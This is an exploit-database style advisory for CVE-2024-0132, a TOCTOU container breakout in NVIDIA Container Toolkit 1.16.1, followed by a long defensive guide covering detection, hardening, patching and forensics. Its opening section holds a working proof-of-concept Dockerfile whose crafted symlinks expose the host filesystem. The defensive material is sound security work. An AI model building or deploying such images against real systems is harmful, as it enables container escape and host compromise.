NVIDIA Container Toolkit 1.16.1 - Time-of-check Time-of-Use (TOCTOU)

Exploit Author: r0binak
Analysis Author: www.bubbleslearn.ir
Category: Local
Language: Shell
Published Date: 2025-03-26

# Exploit Title: Container Breakout with NVIDIA Container Toolkit
# Date: 17/02/2025
# Exploit Author: r0binak
# Software Link Homepage: https://github.com/NVIDIA/nvidia-container-toolkit
# Version: 1.16.1
# Tested on: NVIDIA Container Toolkit 1.16.1
# CVE: CVE-2024-0132

Description: NVIDIA Container Toolkit 1.16.1 or earlier contains a
Time-of-check Time-of-Use (TOCTOU) vulnerability when used with
default configuration where a specifically crafted container image may
gain access to the host file system. This does not impact use cases
where CDI is used. A successful exploit of this vulnerability may lead
to code execution, denial of service, escalation of privileges,
information disclosure, and data tampering.

PoC link: https://github.com/r0binak/CVE-2024-0132

Steps to Reproduce:

Build and run a Docker image from the following Dockerfile:

FROM ubuntu

RUN mkdir -p /usr/local/cuda/compat/

RUN mkdir -p /usr/lib/x86_64-linux-gnu/libdxcore.so.1337/
RUN echo test > /usr/lib/x86_64-linux-gnu/libdxcore.so.1337/libdxcore.so.1337.hostfs

RUN mkdir -p /pwn/libdxcore.so.1337/
RUN ln -s ../../../../../../../../../ /pwn/libdxcore.so.1337/libdxcore.so.1337.hostfs

RUN ln -s /pwn/libdxcore.so.1337 /usr/local/cuda/compat/libxxx.so.1

RUN ln -s /usr/lib/x86_64-linux-gnu/libdxcore.so.1337/libdxcore.so.1337.hostfs /usr/local/cuda/compat/libxxx.so.2

The host file system will reside in
/usr/lib/x86_64-linux-gnu/libdxcore.so.1337.hostfs/

Regards,
Sergey "r0binak" Kanibor

NVIDIA Container Toolkit 1.16.1 — TOCTOU vulnerability (CVE-2024-0132): analysis, impact, and mitigation

This article explains the Time‑of‑check Time‑of‑Use (TOCTOU) vulnerability reported against NVIDIA Container Toolkit (CVE-2024-0132), the root cause, attacker capabilities, indicators, detection approaches, and practical mitigations and hardening recommendations for operators and security teams. The goal is to provide a defensible, operationally useful, and safe security guide for administrators who run GPU workloads in containerized environments.

Executive summary

Product affected: NVIDIA Container Toolkit (nvidia-container-toolkit / nvidia-container-runtime) version 1.16.1 and earlier, in default configuration.
Vulnerability class: Time‑of‑check Time‑of‑Use (TOCTOU) / race condition combined with symlink handling during compatibility library discovery.
Impact: A crafted image may cause the toolkit to bind or expose parts of the host filesystem into the container's view, potentially leading to container escape, privilege escalation, arbitrary code execution, information disclosure, or tampering.
Scope: The issue affects the toolkit when it is used in its default configuration; it does not affect deployments that use CDI (Container Device Interface) specifications for device provisioning.
Mitigation priorities: 1) upgrade to a vendor‑released patch, 2) use CDI where possible, and 3) apply container runtime hardening and host protections.

Technical background (high level)

TOCTOU vulnerabilities arise when a process checks a filesystem condition (time‑of‑check) and then performs an action (time‑of‑use) assuming that the condition has not changed. In the context of the NVIDIA Container Toolkit, the toolkit performs discovery and mapping of CUDA compatibility libraries and helper files before starting a container or when preparing runtime hooks. If an attacker-supplied image contains crafted filesystem entries (notably symlinks and directory structures), an attacker can manipulate the resolution path between the check and the bind/mount operation so that files or directories on the host are exposed to the container.

In practice, this is a class of attack in which symlink resolution and directory traversal, combined with a race window, give access to paths that were meant to be off limits. When it succeeds, the attacker can read or modify files on the host, or influence host-side operations that the toolkit performs.
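
The check-then-use gap described above can be illustrated with a small, self-contained sketch. It runs sequentially in a scratch directory, so there is no real race; the swap simply happens between the check and the use. The directory names (rootfs, host) and the function name are hypothetical, and this is not the toolkit's code.

```shell
#!/usr/bin/env bash
# Simulated check-then-use gap in a scratch directory.
# All names here are illustrative; nothing outside the temp dir is touched.

demo_toctou() {
  local work root outside checked
  work=$(mktemp -d)
  root="$work/rootfs"      # stands in for the container root filesystem
  outside="$work/host"     # stands in for the host filesystem
  mkdir -p "$root/lib" "$outside"
  echo "host-secret" > "$outside/data"
  echo "container-data" > "$root/lib/data"

  # Time of check: the resolved path is inside the root, so it looks safe.
  checked=$(realpath "$root/lib")
  case "$checked" in
    "$(realpath "$root")"/*) ;;
    *) echo "rejected"; rm -rf "$work"; return 1 ;;
  esac

  # The window: the image-controlled entry is replaced by a symlink.
  rm -rf "$root/lib"
  ln -s "$outside" "$root/lib"

  # Time of use: the same path string now resolves outside the root.
  cat "$root/lib/data"
  rm -rf "$work"
}

demo_toctou   # prints: host-secret
```

The usual remedy for this pattern is to resolve the path once and then operate on the resolved object (for example, an already opened file descriptor) instead of re-walking the path string.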

Why this is serious

Containers are supposed to provide isolation; a breakout that exposes host files undermines that isolation.
Because the toolkit runs on the host side as part of GPU runtime setup, it executes with elevated privileges, so a flaw in it gives an attacker far more reach than a bug confined to the container.
Real-world consequences include code execution on the host, data exfiltration, tampering with binaries or keys, or disrupting cluster-wide GPU workflows.

Exploitation complexity

Exploitation requires the ability to run or inject a container image into the target environment (i.e., the attacker must be able to start containers using the targeted toolkit/runtime).
Exploitation typically needs crafted filesystem layout (symlinks and directory structure) inside the image. This is non-trivial but feasible for attackers who can supply images.
Successful exploitation may depend on timing/races; some setups make it harder (e.g., hardened kernels, user namespaces, or alternative device provisioning mechanisms such as CDI).

Detection and indicators of compromise (IoCs)

Below are practical detection ideas you can use to look for attempted or successful exploitation. These checks are defensive and intended for host or orchestrator monitoring.

Filesystem and symlink inspection

# Example: find suspicious symlinks and non-standard files under common CUDA compatibility dirs
# (This is a safe forensics-style query; it looks for symlinks and unexpected file types)
find /usr/local/cuda/compat /usr/lib -maxdepth 4 -type l -ls
find /usr/local/cuda/compat /usr/lib -maxdepth 4 -not -type f -not -type d -not -type l -ls

Explanation: These commands list symbolic links and unusual file types under typical compatibility and library locations. An attacker may create symlinks that try to escape the intended directory. Expect many legitimate library symlinks under /usr/lib, so focus on targets that climb out with ".." or point at unexpected locations, and correlate findings with container image provenance and timestamps.
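
The same inspection can be applied to an unpacked image root filesystem, where the crafted entries actually live. The sketch below lists relative symlinks whose target, once ".." components are normalized, lands outside the scanned root. It assumes GNU findutils and GNU coreutils (realpath with -m and -s); the function name is hypothetical, and absolute targets are skipped because they need a separate, root-relative review.

```shell
#!/usr/bin/env bash
# List symlinks under ROOT whose relative target resolves outside ROOT.
# Intended for an unpacked image rootfs, not for scanning "/" on a live host.

find_escaping_symlinks() {
  local root link target base resolved
  root=$(realpath "$1") || return 1
  find "$root" -type l -print0 |
  while IFS= read -r -d '' link; do
    target=$(readlink "$link")
    case "$target" in
      /*) continue ;;   # absolute targets are out of scope for this sketch
    esac
    base=$(dirname "$link")
    # -m: components may be missing; -s: normalize ".." without following links
    resolved=$(realpath -m -s "$base/$target")
    case "$resolved/" in
      "$root"/*) ;;                                  # stays inside ROOT
      *) printf '%s -> %s\n' "$link" "$target" ;;    # climbs out of ROOT
    esac
  done
}
```

For example, `find_escaping_symlinks ./rootfs` run against an export of the PoC image would be expected to report the `libdxcore.so.1337.hostfs` link, whose target consists of nine `..` components.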

OSQuery / audit rules for persistent monitoring

# Example osquery scheduled query to catch newly created symlinks under runtime-related directories
SELECT path, symlink, type, mtime, uid, gid FROM file WHERE path LIKE '/usr/local/cuda/compat/%' AND symlink = 1;

Explanation: The osquery query above can be scheduled to detect new symlinks in locations used by GPU compatibility layers. Alert on unexpected owners, recent mtime, or symlinks pointing outside expected prefixes.

Logging and runtime event monitoring

Monitor container creation events: which images are launched, by which user, and from which orchestration context.
Collect and analyze audit logs (Linux auditd) for unexpected file opens to sensitive host paths originating from container runtimes (check openat/execve syscalls from the runtime process or its helpers).
Watch for changes to /etc, /root, /var/lib/docker, or package directories on the host shortly after container start.
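
One way to turn the file-change monitoring above into auditd configuration is to generate watch rules for the sensitive paths. This is a minimal sketch: the function name and the key `gpu_host_write` are arbitrary labels chosen here, and the path list is only an example (a watch on /var/lib/docker is likely to be noisy on a busy host).

```shell
#!/usr/bin/env bash
# Print auditd watch rules (rules.d syntax) for a list of host paths.

emit_audit_watch_rules() {
  local key=$1 path
  shift
  for path in "$@"; do
    # -w: watch this path; -p wa: log writes and attribute changes; -k: tag
    printf -- '-w %s -p wa -k %s\n' "$path" "$key"
  done
}

emit_audit_watch_rules gpu_host_write /etc /root
```

The output can be written to a file under /etc/audit/rules.d/ and loaded with `augenrules --load`; matching events can then be searched with `ausearch -k gpu_host_write`.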

Mitigations and hardening (practical recommendations)

Prioritize vendor patches, then apply layered runtime and host hardening.

1) Patch and vendor guidance

Primary mitigation: upgrade to a fixed release from NVIDIA. NVIDIA's security bulletin for CVE-2024-0132 lists Container Toolkit 1.16.2 as the updated version; confirm the current guidance in the bulletin and the GitHub repository before rolling out, and upgrade as soon as possible.
If you cannot immediately upgrade, apply the defensive mitigations described below until a patch is possible.
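
To decide which hosts need the upgrade, the installed version can be compared against the last affected release named in the advisory (1.16.1). The sketch below assumes GNU sort with version ordering (-V) and that `nvidia-ctk --version` prints a version of the form x.y.z somewhere in its output; the function and variable names are hypothetical.

```shell
#!/usr/bin/env bash
# Return 0 if VERSION is at or below the last affected release.

LAST_AFFECTED="1.16.1"

is_affected_version() {
  local version=$1 highest
  # Version-sort the two values; if the advisory's version sorts last
  # (or they are equal), the installed version is not newer than it.
  highest=$(printf '%s\n%s\n' "$version" "$LAST_AFFECTED" | sort -V | tail -n 1)
  [ "$highest" = "$LAST_AFFECTED" ]
}

# Only runs where the toolkit CLI is installed.
if command -v nvidia-ctk >/dev/null 2>&1; then
  installed=$(nvidia-ctk --version | grep -oE '[0-9]+\.[0-9]+\.[0-9]+' | head -n 1)
  if [ -z "$installed" ]; then
    echo "could not parse nvidia-ctk version"
  elif is_affected_version "$installed"; then
    echo "nvidia-container-toolkit $installed: affected, upgrade required"
  else
    echo "nvidia-container-toolkit $installed: newer than $LAST_AFFECTED"
  fi
fi
```

Pre-release suffixes are ignored by the extraction step, so hosts running release candidates should be checked by hand.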

2) Use CDI (Container Device Interface) for GPU device provisioning

CDI is a device provisioning model that removes the need for the toolkit's legacy compatibility discovery path in many deployments. If your workflow supports CDI, adopt it to avoid the vulnerable code path.
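
A quick way to see whether a host is already set up for CDI is to look for spec files in the standard CDI directories. The sketch below assumes the commonly documented locations /etc/cdi and /var/run/cdi and the .yaml and .json extensions; the function name is hypothetical.

```shell
#!/usr/bin/env bash
# Report whether any CDI spec files exist in the given directories.

has_cdi_specs() {
  local dir f
  for dir in "$@"; do
    for f in "$dir"/*.yaml "$dir"/*.json; do
      # An unmatched glob stays literal and fails the -f test.
      [ -f "$f" ] && return 0
    done
  done
  return 1
}

if has_cdi_specs /etc/cdi /var/run/cdi; then
  echo "CDI spec found"
else
  echo "no CDI spec found; one can be generated with:"
  echo "  sudo nvidia-ctk cdi generate --output=/etc/cdi/nvidia.yaml"
fi
```

With a spec in place, runtimes that support CDI accept fully qualified device names, for example `podman run --device nvidia.com/gpu=all ...`. Whether your Docker or containerd version has CDI support enabled should be checked against its own documentation.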

3) Reduce container privileges and capabilities

# Defensive container options (example)
# Docker's --device permission field takes the flags r, w, and m, so read-only is ":r"
docker run --rm \
  --read-only \
  --cap-drop ALL \
  --security-opt no-new-privileges \
  --security-opt seccomp=/path/to/restrictive-seccomp.json \
  --device /dev/nvidia0:/dev/nvidia0:r \
  your-gpu-image

Explanation: The example shows how to reduce privileges when launching a container: make the root filesystem read-only, drop all capabilities, prevent privilege escalation, and apply a restrictive seccomp profile. Map GPU devices explicitly, and read-only where the workload tolerates it. These options limit what a compromised container can do. Where the toolkit hook is still invoked, its library discovery runs on the host side before the container process starts, so treat these options as defense in depth and not as a fix.

4) Enforce host-level confinement for runtimes

Configure the container runtime (dockerd/containerd) to enforce no-new-privileges for containers by default where possible.
Use AppArmor or SELinux profiles to confine runtime helper processes and restrict file accesses to expected paths.
On systemd-managed hosts, apply stronger protections for the container runtime service unit (example below).

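# Example systemd unit snippets for docker/containerd to reduce host-access
# Place in an override file (systemctl edit docker.service)
# Test on a non-production host first: these settings can break the runtime.
[Service]
ProtectSystem=full
ProtectHome=yes
NoNewPrivileges=yes
PrivateTmp=yes
# PrivateDevices=yes hides physical devices, including /dev/nvidia*, from the
# service; enable it only on hosts where the runtime does not pass GPUs through.
#PrivateDevices=yes
ReadOnlyPaths=/usr/local/cuda
# Add other ReadOnlyPaths or InaccessiblePaths as needed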

Explanation: systemd service protections such as ProtectSystem and NoNewPrivileges limit the runtime helper's ability to access or modify the host filesystem, reducing the impact of a TOCTOU or similar vulnerability.

5) Enforce image provenance, admission controls, and least privilege

Require signed images and use admission controllers (e.g., Kubernetes image policies, Open Policy Agent) to block untrusted images.
Restrict who can run containers with GPU access. Limit GPU access to trusted tenants and namespaces.
Prefer non‑privileged runtime profiles. Avoid running containers as privileged or with host mounts unless strictly necessary.
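
On hosts without an admission controller, a small wrapper can apply the same idea before a GPU container is started: accept an image only if its reference begins with an approved registry prefix. This is a minimal sketch; the function name and the registry names in the usage note are hypothetical placeholders, and a prefix check is not a substitute for signature verification.

```shell
#!/usr/bin/env bash
# Accept an image reference only if it starts with an allowed registry prefix.

image_allowed() {
  local image=$1 prefix
  shift
  for prefix in "$@"; do
    case "$image" in
      # Require a "/" right after the prefix so look-alike hosts do not match.
      "$prefix"/*) return 0 ;;
    esac
  done
  return 1
}
```

A launcher script could call `image_allowed "$IMAGE" registry.example.internal || exit 1` before invoking the container runtime, which also rejects short names such as `ubuntu` that resolve to a public registry.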

6) Host filesystem protection and mount options

Avoid unnecessarily writable mounts of host paths into containers (especially /usr, /lib, /etc, /root).
Protect sensitive host directories with mount options such as nodev, nosuid, noexec where appropriate.
Use read-only bind mounts for directories that must be exposed to containers.

Response and remediation checklist

Inventory: identify all hosts running NVIDIA Container Toolkit and the versions in use.
Patch: plan and deploy the vendor patch or upgraded toolkit release as soon as practical.
Restrict: until patched, isolate GPU hosts, restrict image sources, tighten runtime configuration, and apply the hardening measures above.
Scan and investigate: run the detection queries from the Detection section against hosts to look for suspicious symlinks or changes.
Monitor: increase logging level for container runtime operations and monitor for anomalous file accesses or container launches.

Forensics and investigating suspected exploitation

Collect auditd logs around the container start time to find opens/closes/execs that target host paths.
Check timestamps and ownership of files in typical compatibility directories (e.g., /usr/local/cuda/compat and library dirs) and correlate with container image pulls and starts.
Retrieve container image provenance and perform a static analysis of the image filesystem for crafted symlinks or unusual directory structures.
Isolate affected hosts and preserve volatile artifacts (dmesg, /proc/*/mountinfo, runtime logs) for analysis.
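
Preserving the volatile artifacts listed above can be scripted so that it happens consistently before a host is rebooted or reimaged. The sketch below assumes a Linux host with /proc mounted; the function name and output layout are hypothetical, and reading dmesg or another process's mount table may require root.

```shell
#!/usr/bin/env bash
# Copy volatile host state into OUTDIR. Extra arguments are PIDs whose
# mount tables should be captured in addition to the caller's own.

collect_volatile_artifacts() {
  local out=$1 pid
  shift
  mkdir -p "$out" || return 1
  date -u +%Y-%m-%dT%H:%M:%SZ > "$out/collected_at"
  for pid in self "$@"; do
    # Each process has its own mount table; a container's shows its view.
    cat "/proc/$pid/mountinfo" > "$out/mountinfo.$pid" 2>/dev/null || true
  done
  # Kernel messages are lost on reboot, so capture them now.
  dmesg > "$out/dmesg.txt" 2>/dev/null || true
}
```

For a running container, the PID of its main process can be obtained with `docker inspect -f '{{.State.Pid}}' <container>` and passed as an extra argument; an unexpected bind mount of a host path in that mount table is worth a closer look.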

Conclusion and recommended immediate actions

Apply the official NVIDIA patch (highest priority).
Where possible, migrate to CDI-based device provisioning to avoid the affected discovery code path.
Tighten runtime configurations: disable unnecessary privileges, adopt no-new-privileges, use seccomp/AppArmor/SELinux, and restrict who can start GPU-enabled containers.
Deploy continuous detection (osquery/auditd/SIEM) to promptly surface signs of exploitation and suspicious filesystem changes.

References & where to learn more

Vendor advisories and the NVIDIA Container Toolkit GitHub repository — always defer to the vendor's published remediation steps.
Linux kernel and OCI runtime best practices for container isolation (seccomp, AppArmor, SELinux, capabilities).
Container Device Interface (CDI) documentation for secure GPU device provisioning.